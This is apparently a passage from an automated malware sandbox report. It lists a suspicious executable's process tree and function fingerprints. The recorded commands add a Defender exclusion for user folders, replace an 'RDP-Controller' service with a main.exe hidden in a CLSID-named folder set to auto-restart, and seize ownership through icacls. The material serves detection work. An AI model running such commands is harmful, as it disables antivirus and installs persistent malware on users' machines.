                                                                                                                Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                Imagebase:0x7ff788560000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:12
                                                                                                                Start time:10:53:56
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe"
                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                File size:10'639'360 bytes
                                                                                                                MD5 hash:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 42%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:13
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                                                                                                Imagebase:0x7ff7b25f0000
                                                                                                                File size:101'376 bytes
                                                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:14
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:sc.exe stop RDP-Controller
                                                                                                                Imagebase:0x7ff7169c0000
                                                                                                                File size:72'192 bytes
                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:16
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:17
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                                                                                                Imagebase:0x7ff7169c0000
                                                                                                                File size:72'192 bytes
                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:19
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                                                                                                Imagebase:0x7ff7169c0000
                                                                                                                File size:72'192 bytes
                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:20
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:21
                                                                                                                Start time:10:53:59
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:sc.exe start RDP-Controller
                                                                                                                Imagebase:0x7ff7169c0000
                                                                                                                File size:72'192 bytes
                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:10:54:00
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:23
                                                                                                                Start time:10:54:00
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                Imagebase:0x7ff7c1ab0000
                                                                                                                File size:89'088 bytes
                                                                                                                MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 75%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                Target ID:24
                                                                                                                Start time:10:54:00
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\icacls.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                                                                                                Imagebase:0x7ff709000000
                                                                                                                File size:39'424 bytes
                                                                                                                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:25
                                                                                                                Start time:10:54:01
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:10:54:01
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\icacls.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
                                                                                                                Imagebase:0x7ff709000000
                                                                                                                File size:39'424 bytes
                                                                                                                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:27
                                                                                                                Start time:10:54:01
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:29
                                                                                                                Start time:10:54:31
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                File size:55'320 bytes
                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Target ID:30
                                                                                                                Start time:10:54:31
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
                                                                                                                Imagebase:0x7ff751e60000
                                                                                                                File size:570'736 bytes
                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:31
                                                                                                                Start time:10:54:31
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
                                                                                                                Imagebase:0x7ff751e60000
                                                                                                                File size:570'736 bytes
                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:32
                                                                                                                Start time:10:54:51
                                                                                                                Start date:11/10/2024
                                                                                                                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                Imagebase:0x7ff7c1ab0000
                                                                                                                File size:89'088 bytes
                                                                                                                MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Reset < >
                                                                                                                  APIs
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273A05F
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273A065
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273A06B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                                                                                                  • Instruction ID: c3a280d0185942b417767dcebab6ca4e246b6188e66b83ca3be8fc16f3164ffe
                                                                                                                  • Opcode Fuzzy Hash: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                                                                                                  • Instruction Fuzzy Hash: 95B17F71918A4C8FDB56EF28C884A9EB7E1FFA8314F50571AE88AD3256DB70D481CB41
                                                                                                                  APIs
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273D0F7
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0273D0FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                                                                                                  • Instruction ID: 42279980a4c84adda9e365fce6c6f1ced7bdae2729d1aa1a71cc3de2535cb6c0
                                                                                                                  • Opcode Fuzzy Hash: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                                                                                                  • Instruction Fuzzy Hash: 70A19071928B8C8BDB56EF2CC8856EA77E2FB99310F10571AE88AD3155DB30D581CB81
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
                                                                                                                  • Instruction ID: 0ac4565218d8433801be45b3cc18ad049c2ef05f9b4b5b152c911c7e73a37ce4
                                                                                                                  • Opcode Fuzzy Hash: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
                                                                                                                  • Instruction Fuzzy Hash: 28A1C731628E0C8FCB5AEF18C4996ADB3E1FBA9314F00465AD44ED7156DB30D945CB85
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _clrfp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3618594692-0
                                                                                                                  • Opcode ID: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                                                                                                  • Instruction ID: a3b16b21b84fb6496fd466e5a58c1b48d6cacd2d4f049a6b95a5b74a5005ba9b
                                                                                                                  • Opcode Fuzzy Hash: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                                                                                                  • Instruction Fuzzy Hash: 37B16A31510A4DCFDBA9CF1CC88AB6677E1FF49308F198599E899CB262C735E852CB01
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
                                                                                                                  • Instruction ID: b46c35b89ec834784965a015606a7a18c931a156816961a429540460974b0ce5
                                                                                                                  • Opcode Fuzzy Hash: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
                                                                                                                  • Instruction Fuzzy Hash: 6BE16431928B4C8BC74ADF68C8956BAB3E1FFE8300F50571EE486D7255EB74A644C782
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
                                                                                                                  • Instruction ID: 2f05fc9b7793f6db4af47e8734025b0febd236552436d319cdfbad36b5dc4e84
                                                                                                                  • Opcode Fuzzy Hash: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
                                                                                                                  • Instruction Fuzzy Hash: 4261C470A1CF5C4FDB2CEF68984916ABBE5EB85710F14465FE886C3155DF70A8428AC2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
                                                                                                                  • Instruction ID: cb93d3746398458390b6486c115dd25f2b707b305e112ba9ee04b2fc6540aaee
                                                                                                                  • Opcode Fuzzy Hash: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
                                                                                                                  • Instruction Fuzzy Hash: 8451F032318E0C8F8B0CDE6CE49957673E2E7AC325355822EE40ED72A5DF70E8468781
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                                                                  • Instruction ID: 174ff80fd420207a74260161ac038d8107eed192ac3591f5df9560f9d846107f
                                                                                                                  • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                                                                  • Instruction Fuzzy Hash: D821C8317126054BE70CCE2EC89A575B3D6F7D9205B54C27DE14BCB357CD3258038A08
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                                                                  • Instruction ID: 66d804b938f90c6aedd504aed4c49513dfc2d7d7da1cd4c4d155d13b269c81bb
                                                                                                                  • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                                                                                  • Instruction Fuzzy Hash: 0811A1723108048FD74DCE3DC98AAA573D6EB89304B58C2BDE55ACB26AD6358903C744
                                                                                                                  APIs
                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02740DCF
                                                                                                                    • Part of subcall function 02743132: __GetUnwindTryBlock.LIBCMT ref: 02743175
                                                                                                                    • Part of subcall function 02743132: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0274319A
                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02740EA7
                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 027410F5
                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 02741202
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                  • Opcode ID: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                                                                                                  • Instruction ID: 3196b31972fd0869732f338b9349de742021e142e5e9148144a0c1f6e9470638
                                                                                                                  • Opcode Fuzzy Hash: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                                                                                                  • Instruction Fuzzy Hash: D2E1B130A18B488FDB19EF68C489BAA77E1FB99354F50065ED849D7261DF34E4C1CB82
                                                                                                                  APIs
                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 027413E0
                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 02741709
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 3523768491-393685449
                                                                                                                  • Opcode ID: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                                                                                                  • Instruction ID: f38c54bd6a7af62a3931dea612d7ac71ee9cd84975d4bf88e1c3c05821769a17
                                                                                                                  • Opcode Fuzzy Hash: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                                                                                                  • Instruction Fuzzy Hash: 40E1D530918B488FCB19EF28C4896AAB7E1FB59314F54466DD49AC7652DF30E5C2CF82
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                                                                                                  • Instruction ID: 8331186c3b28db98334bbf796730f1b307ed377b3cef09600454a92c1b3c9805
                                                                                                                  • Opcode Fuzzy Hash: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                                                                                                  • Instruction Fuzzy Hash: 60C1F530518F1B8FDB2EEF688058675B2D1FB95714B58466ED98AC3256EF30D881CBC2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $($2$H$P!`$`
                                                                                                                  • API String ID: 0-2682688576
                                                                                                                  • Opcode ID: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                                                                                                  • Instruction ID: b750d099307f2cad2ac505428fb76ba80bc875be27ffc4384d213495f2fecf32
                                                                                                                  • Opcode Fuzzy Hash: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                                                                                                  • Instruction Fuzzy Hash: 37C1F3B09087988FD7A5DF18C08979ABBE0FB99304F508A6ED8CDCB215DB705589CF46
                                                                                                                  APIs
                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 02741A71
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallTranslator
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                  • Opcode ID: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                                                                                                  • Instruction ID: c2d88ca4d6540f754a653240d39081b6f1e66d590871a24545c917c516492f4f
                                                                                                                  • Opcode Fuzzy Hash: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                                                                                                  • Instruction Fuzzy Hash: ECA1B430918B488FCB19EF6CC885AA9BBF1FB98314F54465EE449C7112EF34E581CB86
                                                                                                                  APIs
                                                                                                                  • __except_validate_context_record.LIBVCRUNTIME ref: 027400A5
                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0274013C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                  • Opcode ID: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                                                                                                  • Instruction ID: 4b6297b8b38d76cc29c7e65b6c6ede55eed366a90ad7a31bc8d705eb31c43454
                                                                                                                  • Opcode Fuzzy Hash: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                                                                                                  • Instruction Fuzzy Hash: 9761903021CA088BDB2CEE6CE885B7973D1FB54354F10456DEE8AC7296EF70E8518B85
                                                                                                                  APIs
                                                                                                                  • _CallSETranslator.LIBVCRUNTIME ref: 027417F1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1710700877.0000000002730000.00000040.00001000.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2730000_file.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallTranslator
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                  • Opcode ID: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                                                                                                  • Instruction ID: a69e7c7dc5c006bde32f57f56c0b3d37308ff554ee525de231ae673728270114
                                                                                                                  • Opcode Fuzzy Hash: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
